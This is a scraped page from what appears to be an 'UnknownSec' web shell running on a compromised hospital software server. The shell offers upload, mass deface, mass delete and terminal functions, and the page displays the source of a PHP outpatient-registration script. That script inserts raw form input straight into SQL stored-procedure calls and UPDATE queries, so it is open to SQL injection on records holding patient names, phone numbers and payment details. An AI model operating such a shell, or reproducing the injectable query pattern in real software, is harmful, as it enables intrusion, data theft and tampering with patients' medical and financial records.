UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
opd_saveupdate.php
<?php require_once "config.php"; session_start(); $userid=$_SESSION['userid']; $financialyearid=$_SESSION['financialyearid']; $msg=""; $creationdatetime = date("Y-m-d H:m:s"); $odate=date_create($_POST['trandate']); $opdate=date_format($odate,"Y-m-d"); $opdtime=$_POST['trantime']; $mobileno=$_POST['mobileno']; $patpre=$_POST['patpre']; $patientname=$_POST['patientname']; $patnewold=$_POST['patnewold']; $gender=$_POST['gender']; $age=$_POST['age']; $agey=$_POST['agey']; $address=$_POST['address']; $departmentid=$_POST['department']; $doctorid=$_POST['doctor']; $pattype=$_POST['pattype']; $amount=$_POST['amount']; $discount=$_POST['discount']; $netamount=$_POST['netamount']; $receiveamt=$_POST['receiveamt']; $paymentmode=$_POST['paymentmode']; $expirydate=$_POST['expirydate']; $uhid=$_POST['uhid']; $fileno=$_POST['fileno']; if($_POST['bank']=="Select Bank") { $bankid=0; } else { $bankid=$_POST['bank']; } $transactionno=$_POST['transactionno']; $id= $_POST['id']; $btnopration= $_POST['btnopration']; $appid= $_POST['appid']; if($btnopration=="SAVE") { $sql="call sp_patiententry('".$opdate."','".$opdtime."','OPD', '".$fileno."','".$uhid."','".$patpre."','".$patientname."','','','".$mobileno."','','".$address."','".$pattype."','','','".$gender."','".$agey."','".$age."', '".$amount."','".$discount."','0','".$netamount."','".$receiveamt."','".$patnewold."','".$expirydate."','','','".$paymentmode."','".$bankid."','".$transactionno."','".$_SESSION['financialyearid']."','','".$doctorid."',' ','".$departmentid."','1','".$userid."')"; $stmt = $connect->prepare($sql); $rs = $stmt->execute(); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); if($appid!="") { $query="Update appointmenttb set paymentstatus=1 where appid='".$appid."' "; $result=updaterecord($conn,$query); } $msg="patient save successfully"; } else if($btnopration=="UPDATE") { $query="Update patientmastertb set PntPre='".$patpre."',name='".$patientname."', mobile='".$mobileno."',address1='".$address."',sex='".$gender."',agey='".$age."', pntageyrs='".$agey."',modificationdatetime='".$creationdatetime."' where uhid='".$uhid."' "; $result=updaterecord($conn,$query); if($result==true) { $stmt = $connect->prepare("SELECT accountmasterid from mastertb where accountname='".$departmentid."' and status=0 and Identifier=9"); $stmt->execute(); $depid = $stmt->fetchColumn(); $stmt = $connect->prepare("SELECT accountmasterid from mastertb where accountname='".$doctorid."' and departmentid='".$depid."' and doctortype='Consultant' and status=0 and Identifier=3"); $stmt->execute(); $examinedbyid = $stmt->fetchColumn(); $stmt = $connect->prepare("SELECT accountmasterid from mastertb where accountname='".$bankid."' and status=0 and Identifier=8"); $stmt->execute(); $bank = $stmt->fetchColumn(); if($bank=='') $bank=0; $query="Update patientdetailstb set opddate='".$opdate."',opdtime='".$opdtime."', PntPre='".$patpre."',name='".$patientname."', mobile='".$mobileno."',address1='".$address."',sex='".$gender."',agey='".$age."', pntageyrs='".$agey."',patienttype='".$pattype."',amount='".$amount."',discount='".$discount."',netamount='".$netamount."',receiveamt='".$receiveamt."',expirydate='".$expirydate."', departmentid='".$depid."', examinedbyid='".$examinedbyid."', paymentmode='".$paymentmode."',bankid='".$bank."',chequeno='".$transactionno."' ,modificationdatetime='".$creationdatetime."' where fileno='".$fileno."' "; $result=updaterecord($conn,$query); // $msg=$query; $msg="patient update successfully"; } } echo json_encode ($msg); ?>
Copyright © 2025 - UnknownSec